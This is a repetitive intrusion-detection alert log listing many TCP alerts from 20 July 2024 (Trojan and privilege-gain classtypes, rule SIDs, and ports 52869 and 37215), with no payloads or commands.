                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.561347
                      SID:2027339
                      Source Port:53114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.670071
                      SID:2025132
                      Source Port:55124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:41.032515
                      SID:2027339
                      Source Port:44618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.654988
                      SID:2835222
                      Source Port:35058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.930628
                      SID:2027339
                      Source Port:40272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2835222
                      Source Port:37222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.620386
                      SID:2027339
                      Source Port:50676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317774
                      SID:2831300
                      Source Port:51874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.048479
                      SID:2831300
                      Source Port:56034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.630769
                      SID:2835222
                      Source Port:57592
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.415157
                      SID:2025132
                      Source Port:33562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.300689
                      SID:2025132
                      Source Port:40112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.063023
                      SID:2025132
                      Source Port:40454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221504
                      SID:2829579
                      Source Port:48608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2835222
                      Source Port:33424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817771
                      SID:2835222
                      Source Port:59020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2835222
                      Source Port:38924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.196200
                      SID:2025132
                      Source Port:33894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.987185
                      SID:2027339
                      Source Port:50506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.472956
                      SID:2027339
                      Source Port:37844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.061779
                      SID:2835222
                      Source Port:37316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.989160
                      SID:2025132
                      Source Port:34792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.157620
                      SID:2829579
                      Source Port:48022
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.462291
                      SID:2027339
                      Source Port:46370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.817395
                      SID:2831300
                      Source Port:35392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:12.214887
                      SID:2025132
                      Source Port:44612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.877228
                      SID:2025132
                      Source Port:39966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2835222
                      Source Port:42932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.013456
                      SID:2835222
                      Source Port:50252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.046185
                      SID:2829579
                      Source Port:37230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.641942
                      SID:2027339
                      Source Port:56544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2829579
                      Source Port:45886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.747994
                      SID:2027339
                      Source Port:52954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.095462
                      SID:2835222
                      Source Port:39338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.978712
                      SID:2027339
                      Source Port:33088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2829579
                      Source Port:40604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.786490
                      SID:2027339
                      Source Port:44472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.522141
                      SID:2027339
                      Source Port:32980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.839991
                      SID:2025132
                      Source Port:41154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.656128
                      SID:2829579
                      Source Port:35156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.668312
                      SID:2027339
                      Source Port:39408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.786028
                      SID:2831300
                      Source Port:45846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.897722
                      SID:2831300
                      Source Port:57438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.308979
                      SID:2025132
                      Source Port:52268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2835222
                      Source Port:44104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.811941
                      SID:2025132
                      Source Port:43366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.862503
                      SID:2027339
                      Source Port:37346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.544315
                      SID:2025132
                      Source Port:46764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.591274
                      SID:2027339
                      Source Port:37074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.626717
                      SID:2027339
                      Source Port:59244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.629616
                      SID:2027339
                      Source Port:40660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.988854
                      SID:2025132
                      Source Port:40898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2829579
                      Source Port:56038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.203120
                      SID:2027339
                      Source Port:55958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.285038
                      SID:2829579
                      Source Port:38402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.662466
                      SID:2025132
                      Source Port:47294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.762943
                      SID:2831300
                      Source Port:58862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.370068
                      SID:2025132
                      Source Port:43534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2835222
                      Source Port:54798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.172943
                      SID:2829579
                      Source Port:56586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.831438
                      SID:2831300
                      Source Port:51672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.701160
                      SID:2027339
                      Source Port:42704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.703257
                      SID:2025132
                      Source Port:52068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.612597
                      SID:2027339
                      Source Port:50022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082771
                      SID:2835222
                      Source Port:42202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327808
                      SID:2027339
                      Source Port:44482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.178062
                      SID:2829579
                      Source Port:50036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.536328
                      SID:2025132
                      Source Port:55126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.598095
                      SID:2027339
                      Source Port:47886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.778303
                      SID:2027339
                      Source Port:41608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.995637
                      SID:2831300
                      Source Port:58774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.670958
                      SID:2831300
                      Source Port:40520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.445925
                      SID:2027339
                      Source Port:43564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2835222
                      Source Port:52358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.380677
                      SID:2027339
                      Source Port:38148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.146170
                      SID:2831300
                      Source Port:41844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2829579
                      Source Port:48754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.030115
                      SID:2027339
                      Source Port:41490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.175511
                      SID:2027339
                      Source Port:45520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.979156
                      SID:2831300
                      Source Port:48088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.757783
                      SID:2831300
                      Source Port:49426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.517722
                      SID:2027339
                      Source Port:37782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650337
                      SID:2835222
                      Source Port:54152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104571
                      SID:2835222
                      Source Port:46718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.640160
                      SID:2831300
                      Source Port:56874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2829579
                      Source Port:53044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2829579
                      Source Port:53980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2835222
                      Source Port:53368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.713934
                      SID:2831300
                      Source Port:42144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.940882
                      SID:2027339
                      Source Port:50980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.966322
                      SID:2025132
                      Source Port:48450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.352576
                      SID:2831300
                      Source Port:42072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:09.021221
                      SID:2831300
                      Source Port:59966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.868029
                      SID:2027339
                      Source Port:43854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.161566
                      SID:2027339
                      Source Port:47924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.677189
                      SID:2027339
                      Source Port:37400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.625100
                      SID:2027339
                      Source Port:46808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.223887
                      SID:2835222
                      Source Port:51376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.456435
                      SID:2025132
                      Source Port:35924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2829579
                      Source Port:46646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2829579
                      Source Port:53408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.205247
                      SID:2025132
                      Source Port:39042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.313969
                      SID:2027339
                      Source Port:48368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.405709
                      SID:2025132
                      Source Port:60722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.063098
                      SID:2027339
                      Source Port:55714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.410049
                      SID:2831300
                      Source Port:38492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044152
                      SID:2835222
                      Source Port:59462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2835222
                      Source Port:36698
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.935770
                      SID:2027339
                      Source Port:36748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.140632
                      SID:2835222
                      Source Port:33620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.894099
                      SID:2829579
                      Source Port:56780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.099799
                      SID:2027339
                      Source Port:54386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2829579
                      Source Port:56778
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592479
                      SID:2831300
                      Source Port:37526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.013095
                      SID:2835222
                      Source Port:49406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.575986
                      SID:2027339
                      Source Port:43452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.859884
                      SID:2831300
                      Source Port:38430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.820149
                      SID:2835222
                      Source Port:60704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.011895
                      SID:2027339
                      Source Port:50016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.261844
                      SID:2027339
                      Source Port:36204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.961079
                      SID:2025132
                      Source Port:50102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.127051
                      SID:2025132
                      Source Port:60470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.659435
                      SID:2831300
                      Source Port:52074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.572517
                      SID:2025132
                      Source Port:45208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.134490
                      SID:2027339
                      Source Port:34732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.316196
                      SID:2027339
                      Source Port:59750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.328264
                      SID:2027339
                      Source Port:44472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.479730
                      SID:2025132
                      Source Port:46728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2835222
                      Source Port:52948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.364551
                      SID:2831300
                      Source Port:55070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.096276
                      SID:2027339
                      Source Port:43620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2829579
                      Source Port:38606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.720668
                      SID:2831300
                      Source Port:36286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.328264
                      SID:2025132
                      Source Port:39722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.609855
                      SID:2831300
                      Source Port:38310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2829579
                      Source Port:45164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.231819
                      SID:2027339
                      Source Port:45896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.609595
                      SID:2027339
                      Source Port:33306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.697003
                      SID:2025132
                      Source Port:55182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.533244
                      SID:2025132
                      Source Port:57514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2835222
                      Source Port:54320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.856771
                      SID:2831300
                      Source Port:42370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.222128
                      SID:2835222
                      Source Port:38764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.210939
                      SID:2027339
                      Source Port:47266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.686799
                      SID:2831300
                      Source Port:36000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.592206
                      SID:2831300
                      Source Port:34858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.115230
                      SID:2831300
                      Source Port:48868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.411586
                      SID:2025132
                      Source Port:37476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.766239
                      SID:2829579
                      Source Port:53782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2835222
                      Source Port:50676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.305781
                      SID:2027339
                      Source Port:50004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.765093
                      SID:2831300
                      Source Port:46870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.569319
                      SID:2027339
                      Source Port:51334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2835222
                      Source Port:46900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.817771
                      SID:2829579
                      Source Port:60098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148144
                      SID:2829579
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.185981
                      SID:2027339
                      Source Port:59030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.929722
                      SID:2025132
                      Source Port:40550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221646
                      SID:2829579
                      Source Port:57502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.473903
                      SID:2027339
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2835222
                      Source Port:53706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.849112
                      SID:2835222
                      Source Port:32780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.298100
                      SID:2025132
                      Source Port:57352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.033216
                      SID:2027339
                      Source Port:47750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2829579
                      Source Port:51020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.376233
                      SID:2027339
                      Source Port:42130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.056493
                      SID:2027339
                      Source Port:36906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.147433
                      SID:2027339
                      Source Port:34558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.663245
                      SID:2831300
                      Source Port:37190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.215598
                      SID:2025132
                      Source Port:49828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.631492
                      SID:2027339
                      Source Port:44358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2835222
                      Source Port:41150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2835222
                      Source Port:50952
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.779503
                      SID:2027339
                      Source Port:45168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.858878
                      SID:2025132
                      Source Port:54142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.428577
                      SID:2027339
                      Source Port:51684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.892811
                      SID:2025132
                      Source Port:44010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.290003
                      SID:2835222
                      Source Port:38354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2829579
                      Source Port:48420
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.046185
                      SID:2829579
                      Source Port:51004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
